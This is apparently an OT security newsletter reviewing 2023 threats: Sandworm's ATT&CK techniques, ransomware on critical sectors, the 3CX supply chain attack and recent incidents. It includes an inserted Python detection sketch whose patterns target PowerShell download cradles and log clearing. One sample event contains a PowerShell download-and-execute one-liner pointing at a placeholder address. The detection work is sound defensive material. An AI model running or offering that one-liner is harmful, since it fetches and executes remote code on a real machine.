IT/OT Security News Update
1st of December 2023
Steven Lane, OT Security Consultant
This Week's Overall Theme: Reviewing 2023 and Looking Forward to 2024. Advanced Persistent Threats and OT Security.
TL;DR: This IT/OT Security Update highlights escalating cyber threats in operational technology. It covers sophisticated tactics by groups like Russia's Sandworm, increasing ransomware attacks on critical sectors, and potential new threats in 2024. Key incidents include attacks on Ukrainian infrastructure and a significant cyber attack in Denmark. The update also delves into the evolving nature of OT cyber threats, emphasising the need for robust cybersecurity measures to protect against these sophisticated and varied challenges.
The OT Security Landscape
The OT security landscape in 2023 has been a complex tableau of evolving cyber threats, marked by sophisticated attacks with significant potential for physical harm. Advanced Persistent Threats (APTs) like the Russian-linked Sandworm team have showcased a strategic shift in cyber warfare tactics, using more streamlined, less detectable, and efficient methods. For instance, Sandworm's attack on Ukrainian critical infrastructure leveraged novel OT-level techniques, indicating an integration of cyber and kinetic warfare. These attacks, synchronised with mass missile strikes, caused unplanned power outages and showcased the severe potential for physical consequences.
In Denmark, the most significant cyber attack in the country's history targeted critical infrastructure, particularly exploiting vulnerabilities in Zyxel firewalls. These attacks, believed to involve multiple groups, including potentially Sandworm, forced many companies into 'island mode,' isolating from the internet to prevent further damage. The precision and coordination of these attacks implied a high level of resources and planning, underscoring the targeted nature of these threats against critical infrastructure.
Additionally, the OT environment faced diverse threats from ransomware groups targeting critical sectors like manufacturing, healthcare, and education. Groups like Royal, LockBit 3.0, BianLian, and Cl0p demonstrated a range of tactics, from double-extortion to data exfiltration-based extortion. These ransomware attacks have increasingly targeted Linux systems, including VMware ESXi servers, due to their critical role in services and sensitive data handling, leading to significant service outages and increased ransom pressure.
Revelations from the leaked Vulkan Files have exposed Russia's NTC Vulkan's involvement in developing offensive cyberwarfare tools, potentially targeting operational technology (OT) systems, including transportation networks. These documents, analysed by Mandiant and considered legitimate, detail the company's collaboration with Russian intelligence, particularly GRU Unit 74455, known as Sandworm. Key projects include Scan, Amesit (or Amezit), and Krystal-2B, with aims ranging from large-scale data collection to supporting coordinated attacks on OT environments, particularly transportation and utility systems. The Vulkan Files highlight Russia's strategic interest in critical infrastructure targets and underscore the growing need for robust cybersecurity measures in the OT sector, especially in transportation systems, which are increasingly vulnerable to sophisticated cyber threats.
One notable incident (March 2023) was the "SmoothOperator" supply chain attack linked to North Korean actors, which compromised the infrastructure of the 3CX Private Automatic Branch Exchange (PABX) software, affecting up to 600,000 companies. The company website states that 3CX has 12 million daily users in the automotive, food and beverage, hospitality, manufacturing and managed service sectors. Telecoms are critical to operational control rooms, and many of those services run over voice-over-IP. This attack demonstrated threat actors' innovative methods to exploit network access and distribute malware. It showed the potential for an attack at scale, and given the targets, OT was likely impacted. An attack like this could occur on a platform directly connected to OT, such as a cloud-based OT monitoring and alerting solution. We might expect an attack like that in 2024. I have a looming sense that this attack is overdue.
Collectively, these events highlight the evolving nature of OT cyber threats. The sophistication and strategic coordination of these attacks emphasise the need for robust cybersecurity strategies and heightened vigilance. As we look towards 2024, it is evident that OT security will continue to be a critical focus area, requiring advanced and vigilant cybersecurity strategies to protect critical infrastructure and mitigate the risk of physical consequences from cyberattacks.
Looking ahead to 2024, the landscape of operational technology (OT) security is expected to confront an array of advanced and increasingly sophisticated threats. A key trend will be the escalation of state-sponsored cyberattacks, potentially surging amid rising geopolitical tensions. These attacks will likely target data theft, IT infrastructure destruction, long-term espionage, and cyber sabotage, often with politically motivated objectives. Another emerging trend is increasing hacktivism, which has become more prevalent in geopolitical conflicts, often leading to false information and alert fatigue among cybersecurity professionals.
Exploiting vulnerabilities in commonly used software and appliances is a significant concern. The discovery of high and critical severity vulnerabilities, which sometimes receive limited research and delayed fixes, could pave the way for new, large-scale, and stealthy botnets capable of targeted attacks. Supply chain attacks may evolve, targeting smaller firms to breach major ones. Such attacks could lead to developments in dark web access market activities related to supply chains, enabling more efficient and large-scale attacks.
Hack-for-hire groups are on the rise, providing data theft services to clients ranging from private investigators to business rivals. This trend is expected to grow in the coming year, adding another layer of complexity to the OT security landscape. Additionally, despite modern security measures, kernel-level code execution barriers are increasingly being bypassed by APTs and cybercrime groups. Windows kernel attacks are on the rise, facilitated by abuses of the Windows Hardware Compatibility Program (WHCP) and the underground market for Extended Validation (EV) certificates and stolen code signing certificates.
These evolving threats in the OT landscape for 2024 highlight the need for robust and proactive cybersecurity measures. Organisations must enhance their defences against these sophisticated and varied cyber threats to protect critical infrastructure and maintain operational resilience. 2024 will need to see an uplift and acceleration of OT cyber transformation programs as we face a rapidly increasing threat landscape.
Sandworm: Russia’s Infamous Hacking Unit
This week, given all of the news headlines, I have been educating myself about Sandworm. I have read about this notorious APT in the past. Still, I decided to spend time reading more as they seem to keep hitting the headlines, and we are increasingly reading about sophisticated attacks on Electricity Grids worldwide.
Sandworm, a moniker derived from the fictional creature in Frank Herbert's "Dune," has become synonymous with state-sponsored cyber warfare. Traced to the Russian military intelligence service (GRU), this group's activities have significantly impacted geopolitical dynamics and highlighted the criticality of cybersecurity in national infrastructure.
Emerging in the shadows of the 2008 Russo-Georgian war, Sandworm's initial activities included spearphishing and exploitation of vulnerabilities. Their operations gained notoriety with the attacks on Ukraine’s power grid in 2015 and 2016, which marked the first known instance of a cyberattack causing a power outage. Their operations have evolved from cyber espionage to large-scale, politically motivated disruption, making them distinct among state-sponsored groups.
Tactics, Techniques, and Procedures (TTPs) of Sandworm
Using the MITRE ATT&CK page for Sandworm and other references, such as [1] [2], we can deduce some approaches they use to get into an organisation, often to attack Operational Technology. This does not cover every approach but is a view based on looking at the TTPs of attacks they have carried out, such as attacks on Ukrainian power.
Initial Access
Phishing (T1566): Sandworm primarily used spearphishing emails, often crafted to resemble those from trustworthy sources, to gain access to computers or account credentials. They also developed and tested spearphishing techniques to enhance their success.
Execution
Command and Scripting Interpreter (T1059): Sandworm heavily leveraged PowerShell commands and scripts for discovering system information, executing code, and downloading malware. They deployed malicious PowerShell scripts containing credential harvesting tools that operated only in memory, evading antivirus detection.
User Execution (T1204): Spearphishing emails often contained malware-laced documents requiring user execution for deployment.
Persistence
Valid Accounts (T1078): Sandworm obtained and used existing account credentials to maintain persistence in victim systems. They primarily deployed malware and hacking tools to control victim computers and networks.
Privilege Escalation
Valid Accounts (T1078): Sandworm utilised malware to escalate system privileges and identify other computers on the same network for potential compromise.
Defense Evasion
Indicator Removal on Host (T1070): The group obfuscated certain malware features, such as Olympic Destroyer (used by Sandworm Team against the 2018 Winter Olympics, held in Pyeongchang, South Korea), to hinder post-attack investigations. They also deleted data and cleared event logs to obscure their activities.
Masquerading (T1036): Sandworm attempted to emulate malware that other groups like Lazarus Group used to disguise their activities.
Credential Access
OS Credential Dumping (T1003): They dumped credentials from compromised machines to obtain login details and other credentials.
Unsecured Credentials (T1552): Customised malware incorporated usernames and passwords obtained from compromised machines before spreading further.
Discovery
File and Directory Discovery (T1083): Sandworm accessed and browsed files on compromised machines, searching for credential files and network configuration details.
Lateral Movement
Exploitation of Remote Services (T1210): The group exploited remote services to access internal systems, deploying malware for system privilege escalation, credential harvesting, and network movement.
Collection
File and Directory Discovery (T1083): After accessing victims’ computers, Sandworm performed functions to identify, collect, and package targeted data, including credentials and network information.
Command and Control
Data Obfuscation (T1001): Sandworm established command and control to create a single point of access between compromised networks and their server, allowing them to hide their activity and issue commands.
Exfiltration
Valid Accounts (T1078): Legitimate credentials were leveraged to exfiltrate data from victim networks and retrieve internal documents.
Impact
Defacement (T1491): Sandworm defaced websites and disrupted service following the compromise of a Georgian web hosting provider.
Inhibit System Recovery (T1490): Destructive malware was deployed to delete files, force shutdowns, and impede recovery, rendering computers inoperable.
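Two of the TTPs above leave traces a defender can hunt for: PowerShell tooling that runs only in memory (T1059) and clearing of Windows event logs (T1070). The following is an added detection sketch, not code from the original post or from MITRE; it runs over constructed event records shaped like SIEM-normalised Windows log fields (the host names, user names, URL and the pattern list are all assumptions) and correlates the two techniques per host.

```python
"""Detection sketch for two Sandworm TTPs: in-memory PowerShell tooling
(T1059, sub-technique T1059.001) and clearing of Windows event logs
(T1070, sub-technique T1070.001).  Input records are constructed to look
like event-log fields after a SIEM has normalised them."""
import re
from dataclasses import dataclass

# Hunting patterns for script blocks that stage code in memory instead of
# writing it to disk (PowerShell Script Block Logging, event ID 4104).
IN_MEMORY_PATTERNS = {
    "invoke-expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "download-cradle": re.compile(r"DownloadString|DownloadData", re.I),
    "reflective-load": re.compile(r"Reflection\.Assembly\]::Load", re.I),
    "encoded-payload": re.compile(r"FromBase64String|-enc(odedcommand)?\b", re.I),
}

# (channel, event ID) pairs that Windows writes when a log is cleared.
LOG_CLEARED = {("Security", 1102), ("System", 104)}


@dataclass(frozen=True)
class Finding:
    host: str
    technique: str
    detail: str


def check_powershell_in_memory(event):
    """T1059.001: flag 4104 script blocks that match in-memory staging patterns."""
    if event.get("event_id") != 4104:
        return None
    block = event.get("script_block", "")
    hits = sorted(name for name, rx in IN_MEMORY_PATTERNS.items() if rx.search(block))
    if not hits:
        return None
    return Finding(event["host"], "T1059.001", "script block matched " + ", ".join(hits))


def check_log_cleared(event):
    """T1070.001: flag the audit record written when a Windows log is cleared."""
    if (event.get("channel"), event.get("event_id")) not in LOG_CLEARED:
        return None
    who = event.get("subject_user", "unknown")
    return Finding(event["host"], "T1070.001", f"{event['channel']} log cleared by {who}")


CHECKS = (check_powershell_in_memory, check_log_cleared)


def analyse(events):
    """Run every check over every event and return the findings in order."""
    findings = []
    for ev in events:
        for check in CHECKS:
            finding = check(ev)
            if finding is not None:
                findings.append(finding)
    return findings


def hosts_with_multiple_techniques(findings):
    """Hosts showing more than one technique: in-memory execution followed by
    log clearing on the same machine is where an analyst should look first."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f.host, set()).add(f.technique)
    return sorted(h for h, techs in by_host.items() if len(techs) > 1)


# Constructed sample events, not real telemetry (192.0.2.10 is a documentation address).
SAMPLE_EVENTS = [
    {"host": "hmi-ws01", "channel": "Microsoft-Windows-PowerShell/Operational",
     "event_id": 4104, "script_block": "Get-Service | Where-Object Status -eq 'Running'"},
    {"host": "eng-ws02", "channel": "Microsoft-Windows-PowerShell/Operational",
     "event_id": 4104,
     "script_block": "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/s')"},
    {"host": "eng-ws02", "channel": "Security", "event_id": 1102, "subject_user": "svc_backup"},
    {"host": "scada-srv", "channel": "System", "event_id": 104, "subject_user": "operator"},
]

if __name__ == "__main__":
    results = analyse(SAMPLE_EVENTS)
    for f in results:
        print(f"{f.host:10} {f.technique}  {f.detail}")
    print("hosts with multiple techniques:", hosts_with_multiple_techniques(results))
```

Only eng-ws02 trips both checks, which is the correlation that would push it to the top of a triage queue; the benign Get-Service block on hmi-ws01 produces no finding.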
Notable campaigns attributed to Sandworm
Notable campaigns and events attributed to the Sandworm hacking group include:
Read more here and here (for example), but there is plenty on the internet to read. This MSc Dissertation is an exciting read, and this article is also interesting: This Is the New Leader of Russia’s Infamous Sandworm Hacking Unit.
Believe me, you can spend hours going down this rabbit hole and reading about this APT!
Roundup
Here is a roundup of some key articles I have read this week.
Europe’s grid is under a cyberattack deluge, industry warns
The recent Politico article reports a worrying surge in cyberattacks on Europe's energy grid, with attacks doubling globally between 2020 and 2022. Industry leaders, alarmed by these attacks' increasing sophistication and frequency, emphasise the need for more robust cybersecurity defences. The attacks, primarily from Russia and other non-democratic nations, exploit the vulnerabilities presented by the digitisation of Europe's electricity networks. Despite new EU cybersecurity regulations for critical sectors, challenges persist, including outdated grid infrastructure and a shortage of cybersecurity experts, underscoring the urgent need for enhanced protection measures in the energy sector amidst growing geopolitical instability. [Read More]
Sandworm Disrupts Power in Ukraine Using a Novel Attack Against Operational Technology
Towards the end of 2022, Mandiant released a report detailing a highly complex cyber-physical incident in Ukraine. This incident was attributed to a Russian-linked threat actor known as Sandworm. The attack targeted critical infrastructure within Ukraine, utilising innovative techniques that impacted industrial control systems and operational technology. Initially, the Sandworm group employed Living Off the Land (LotL) techniques to disrupt substation circuit breakers, which resulted in power outages. This attack coincided with missile strikes that occurred across the region. Following this, a new CADDYWIPER variant was deployed in the victim's IT environment, showcasing the evolving sophistication and maturity of Russia's offensive operational technology capabilities. This attack is a stark reminder of Sandworm's ability to develop and adapt such capabilities quickly, posing a significant threat to critical infrastructure worldwide, Ukraine included, that relies on similar systems. [Read more]
CISA and NCSC roll out guidelines for secure AI system development
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the U.K. National Cyber Security Centre (NCSC) have jointly released the 'Guidelines for Secure AI System Development'. Endorsed by 23 global cybersecurity organisations, these guidelines are significant in addressing the challenges of artificial intelligence (AI), cybersecurity, and critical infrastructure. They emphasise the importance of Secure-by-Design principles and cover the entire AI system development lifecycle, including secure design, development, deployment, and operation and maintenance. [Read more 1, 2]
Security News Update
Here are some things that have popped into my newsfeed and consciousness this week and interest me.
Cyber-attack closes hospital emergency rooms in three US states
A recent ransomware attack has severely impacted Ardent Health Services, leading to the shutdown of emergency rooms in at least three states, including New Mexico, Texas, and Oklahoma. The attack, first detected on the morning of November 23, 2023, resulted in the shutdown of many of the company's computerised services. Ardent Health, responsible for overseeing 30 hospitals in the United States, had to divert some emergency room patients to other area hospitals and reschedule some non-emergent, elective procedures in response to the attack. The University of Kansas Health System St. Francis Campus in Topeka, Kansas, was put on "divert status" due to the cyberattack, affecting ambulance services, though the emergency room remained open. [Read more]
Attacks Against South African ICS and IoT Systems Steadily Decrease
In the third quarter of 2023, South Africa saw fewer cyberattacks targeting its industrial control systems (ICS) and Internet of Things (IoT) devices. According to Kaspersky's ICS CERT, 22% of South Africa's ICS were targeted by cyberattacks during this period. This represents a reduction compared to the first half of 2023, when 29.1% of ICS systems were affected. Additionally, the rate of attacks was lower than in 2022, when 38% of ICS systems in the Middle East, Turkey, and Africa were attacked. Regarding IoT devices, 28% in South Africa contained malware, a significant proportion, though lower than in previous periods. Comparatively, 12% of Kenyan and 6% of Nigerian IoT systems had malware infections. [Read more]
Africa is among the regions with the highest number of detected attacks on industrial control systems (ICS computers).
Africa has been identified as the region with the highest detected attacks on Industrial Control Systems (ICS) computers in the first half of 2023. The attacks were detected on 40.3% of ICS computers across the continent, a higher percentage than any other region globally. This alarming figure indicates a significant vulnerability of African ICS infrastructures to cyber threats.
ICS computers are critical in various industries, including oil and gas, energy, automotive manufacturing, and building automation. They are crucial in operational technology functions, ranging from engineering workstations and operator consoles to supervisory control and data acquisition (SCADA) servers and human-machine interfaces (HMI). The cyberattacks targeting these systems are particularly dangerous because they can lead to material losses and production downtime and potentially physically harm the facilities they control. This, in turn, can severely impact a region's social welfare, ecology, and macroeconomics.
The types of cyber threats these African systems face include malicious scripts, spy trojans, worms, ransomware, and other forms of malware. Notably, in the first half of 2023, Africa had the highest percentage of ICS computers on which spyware was blocked (9.8%), compared to a global average of 6.1%. Furthermore, the continent also led in terms of ICS computers affected by attacks from denylisted internet resources (14.8%), which are typically associated with distributing or controlling malware. This figure surpasses the global average of 11.3%.
It is important to note that the threat landscape can vary significantly between countries and industries within Africa, influenced by differences in security maturity and the specific focus of threat actors. For instance, 29.1% of ICS computers in South Africa, 32.6% in Nigeria, and 34.5% in Kenya were affected by malware.
Viruses and worms spread across ICS networks through removable media, shared folders, infected files such as backups, and network attacks on outdated software. Africa experienced a high incidence of worm detections on ICS computers (7% compared to a 2.3% global average), making it the leader in terms of the percentage of ICS computers on which threats were detected following the connection of removable devices.
These findings underscore the urgent need for improved cybersecurity measures and awareness in Africa, especially in critical industries relying heavily on ICS and operational technology. [Read more] and [Read more].
Mideast Oil & Gas Facilities Could Face Cyber-Related Energy Disruptions
The oil and gas facilities in the Middle East could face significant disruptions due to cyber-related threats, particularly amidst the ongoing Israel-Gaza conflict. Security experts have raised concerns that the ongoing conflict could increase the vulnerability of the region's oil and gas operations to cyberattacks, potentially impacting global energy supplies. According to a report by S&P Global Ratings, the Middle East's gas industry is more susceptible to physical attacks than the oil sector, but both industries are at risk of cyberattacks. [Read more]
Idaho National Nuclear Lab Targeted in Major Data Breach
The data breach at Idaho National Laboratory (INL), which occurred on the night of November 19, 2023, was discovered the following day. A cyberattack from SiegedSec, a politically motivated hacking group, caused it. The breach targeted INL’s Human Resources application, part of the Oracle HCM system, a US federally approved vendor system outside the lab. This incident compromised sensitive employee information, including social security numbers, banking details, addresses, health care records, marital status, and termination information.
SiegedSec claimed responsibility for the hack and posted the stolen data on its Telegram social media account, where it remained for several days before being removed. The extent of the data breach is substantial, impacting thousands of current and former local workers. However, the number of people affected and the number of times the information was downloaded remain unknown.
INL has created a webpage to inform current and former employees about the breach and the steps they should take. The INL and law enforcement agencies are still investigating the full scope and impact of the breach. [Read more]
Podcasts to Listen to over the Weekend
Bletchley Park Podcast - E157 – Security & Insecurity Part 2
The episode E157, titled "Security & Insecurity Part 2" from Bletchley Park, is a follow-up to their tenth-anniversary episode E141. In the initial episode, the focus was on the crucial role of secrecy in wartime codebreaking, particularly its impact on operations at Bletchley Park and on the lives of the people working there. The follow-up episode, featuring Research Officer Dr. Thomas Cheetham and special guest Tony Comer, a former Departmental Historian at GCHQ, delves into the challenges of maintaining security in field operations. It highlights how signals intelligence, crucial in making life-and-death decisions at battlefronts, posed significant security challenges. The episode discusses the necessity of well-planned, flexible strategies and, importantly, the element of trust in the safe utilisation of Ultra intelligence. [Listen here]
Upcoming Conferences
Feedback
I'd like to hear what you think of this newsletter. This is a brain dump of how I keep up to speed and stay aware of threats, vulnerabilities, news, hacks and things that interest me. If you have feedback or ideas, please connect with me and send me a message.
Have a great week ahead!
Protecting the Past, Present and the Future with Incident Response Services, Digital Forensics, eDiscovery, Cyber Security Solutions and Managed Services
Very interesting reading - thank you for sharing your thoughts and insights. The threat posed by the well-organised and funded cyber-criminal gangs will, in my opinion, only increase in severity and frequency. It is too "easy" for such gangs to profit from their activities, with little chance of being brought to justice, meaning the cat-and-mouse game will become ever more challenging as defenders (IT & OT Cyber Security Teams) race to improve corporate and industrial control systems cyber-defences against known threats. All the while, the cyber-criminals need only find new or existing vulnerabilities within a system to launch successful attacks. The definition of a successful attack is fluid: it may be a ransom payment, or it may be motivated by a desire to cause disruption as part of a greater scheme. And now, we need to consider how the rise of AI-driven cyber-attacks will play out versus AI-driven cyber-defence solutions...
Governance, Risk and Compliance Lead at Gemserv
This is both timely and very informational. There really is no excuse anymore like we had in the past. The industry was taken by surprise in the days of Conficker (who remembers that?), and really should have learned valuable lessons from it. But we were still taken unawares by Stuxnet. This newsletter is refreshing to see because I think this is the right platform for it. Without curation like you have done, many are either not interested or overwhelmed with the different perspectives, and even how much of the information is helpful.